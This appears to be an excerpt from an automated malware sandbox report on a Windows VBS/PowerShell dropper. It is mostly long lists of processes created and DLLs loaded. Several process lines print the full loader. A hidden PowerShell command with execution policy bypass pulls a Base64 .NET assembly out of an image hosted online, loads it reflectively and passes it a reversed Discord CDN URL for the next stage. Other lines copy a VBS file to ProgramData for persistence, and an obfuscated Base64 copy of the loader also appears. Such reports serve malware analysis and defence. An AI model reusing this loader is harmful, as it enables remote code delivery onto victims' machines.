C0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
